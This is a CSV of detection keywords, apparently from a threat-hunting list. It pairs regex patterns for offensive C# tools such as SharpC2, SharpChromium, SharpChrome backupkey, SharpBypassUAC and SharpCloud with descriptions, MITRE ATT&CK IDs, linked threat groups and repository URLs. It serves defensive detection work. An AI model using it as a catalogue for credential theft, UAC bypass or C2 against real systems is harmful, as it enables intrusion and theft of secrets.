"*SharpBuster.AssemblyInfo.cs*",".{0,1000}SharpBuster\.AssemblyInfo\.cs.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","58838"
"*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58839"
"*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58840"
"*SharpBypassUAC.exe*",".{0,1000}SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58841"
"*SharpC2 *",".{0,1000}SharpC2\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58842"
"*SharpC2*.cs*",".{0,1000}SharpC2.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58843"
"*SharpC2*.exe*",".{0,1000}SharpC2.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58844"
"*sharpc2*client-windows.zip*",".{0,1000}sharpc2.{0,1000}client\-windows\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58845"
"*SharpC2.*",".{0,1000}SharpC2\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58846"
"*SharpC2.API*",".{0,1000}SharpC2\.API.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58847"
"*SharpC2Event*",".{0,1000}SharpC2Event.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58848"
"*SharpC2Hub*",".{0,1000}SharpC2Hub.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58849"
"*SharpC2Webhook*",".{0,1000}SharpC2Webhook.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58850"
"*SharpCalendar.exe*",".{0,1000}SharpCalendar\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","58851"
"*SharpCat.exe*",".{0,1000}SharpCat\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","58852"
"*SharpChisel*",".{0,1000}SharpChisel.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58853"
"*SharpChisel.exe*",".{0,1000}SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58854"
"*SharpChrome backupkey *",".{0,1000}SharpChrome\sbackupkey\s.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58855"
"*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58856"
"*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58857"
"*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58858"
"*SharpChrome* backupkey *.pvk*",".{0,1000}SharpChrome.{0,1000}\sbackupkey\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58859"
"*SharpChrome.cs*",".{0,1000}SharpChrome\.cs.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58860"
"*SharpChrome.exe*",".{0,1000}SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58861"
"*sharpchromium *",".{0,1000}sharpchromium\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58862"
"*SharpChromium.csproj*",".{0,1000}SharpChromium\.csproj.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58863"
"*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58864"
"*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58865"
"*SharpChromium.sln*",".{0,1000}SharpChromium\.sln.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58866"
"*SharpChromium-master*",".{0,1000}SharpChromium\-master.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58867"
"*SharpClipboard.exe*",".{0,1000}SharpClipboard\.exe.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","58868"
"*SharpClipboard-master.zip*",".{0,1000}SharpClipboard\-master\.zip.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","58869"
"*SharpClipHistory*",".{0,1000}SharpClipHistory.{0,1000}","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Reconnaissance","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","N/A","2","194","32","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z","58870"
"*sharpcloud.cna*",".{0,1000}sharpcloud\.cna.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58871"
"*SharpCloud.csproj*",".{0,1000}SharpCloud\.csproj.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58872"
"*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58873"
"*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58874"
"*SharpCloud.sln*",".{0,1000}SharpCloud\.sln.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58875"
"*SharpCloud-master*",".{0,1000}SharpCloud\-master.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58876"
"*SharpCOM.exe*",".{0,1000}SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58877"
"*SharpCOMManager.cs*",".{0,1000}SharpCOMManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58878"
"*sharpcompile*.exe*",".{0,1000}sharpcompile.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58879"
"*sharpCompileHandler*",".{0,1000}sharpCompileHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58880"
